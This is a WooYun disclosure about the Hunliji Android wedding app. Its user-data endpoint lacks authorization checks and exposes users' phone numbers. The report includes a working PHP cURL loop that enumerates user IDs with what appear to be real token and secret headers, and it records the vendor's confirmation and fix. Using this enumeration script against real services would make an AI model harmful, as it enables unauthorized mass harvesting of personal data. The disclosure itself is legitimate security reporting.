当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111483

漏洞标题:婚礼纪安卓APP数据非授权访问导致大量用户数据等资料泄露

相关厂商:hunliji.com

漏洞作者: rainrain

提交时间:2015-05-04 14:31

修复时间:2015-06-18 14:50

公开时间:2015-06-18 14:50

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

安卓APP在获取已登录用户数据时采用的是GET请求,且未做权限控制,返回数据包含用户手机号

详细说明:

百科介绍:婚礼纪是一款用于婚礼筹备与记录的移动应用,由杭州火烧云科技有限公司推出。其专注婚礼行业垂直细分市场,帮助新人解决婚礼筹备与记录的难题。集婚礼工具(富媒体请柬)、婚礼行业商家展示、婚品导购、社区分享为一体的跨平台移动婚礼应用。

漏洞证明:

登录后点击底部菜单栏“我的”,通过抓包工具看到是通过GET请求获取当前用户信息的

Screenshot_2015-05-01-14-17-02.png


抓包:

QQ图片20150501142057.png


下面来构造个循环获取数据,

QQ图片20150501142157.png


插入数据库:

QQ图片20150501142223.png


PHP CURL:
for($i=833500;$i<833566;$i++){
	$curl = curl_init('http://www.hunliji.com/users/'.$i.'.json');
		$header = array();
		$header[] = 'appver: 5.0.1';
		$header[] = 'phone: 37a1068a-f6b2-3f5f-9e43-c7a32904d638';
		$header[] = 'city: {"expo_cid":0,"gps_latitude":30.420344,"community_cid":0,"gps_longitude":114.320962}';
		$header[] = 'devicekind: android';
		$header[] = 'token: 469460297bb1e82fdedf56401b073c08';
		$header[] = 'secret: c27f1d2c5acf20994fa15a49f1ed165d';
		$header[] = 'Host: www.hunliji.com';
		$header[] = 'Connection: Keep-Alive';
		$header[] = 'User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)';
		curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
        // 不输出header头信息
        curl_setopt($curl, CURLOPT_HEADER, 0);
        // 保存到字符串而不是输出
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        $response = curl_exec($curl);
        curl_close($curl);
		//echo($response);
		$rs=json_decode($response,true);
		print_r($rs);
}

修复方案:

授权控制,你懂的

版权声明:转载请注明来源 rainrain@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-04 14:48

厂商回复:

用户的事无小事,涉及到用户隐私,是比较严重的问题了。

最新状态:

2015-05-12:漏洞已经修复,非常感谢作者对我们信息安全的帮助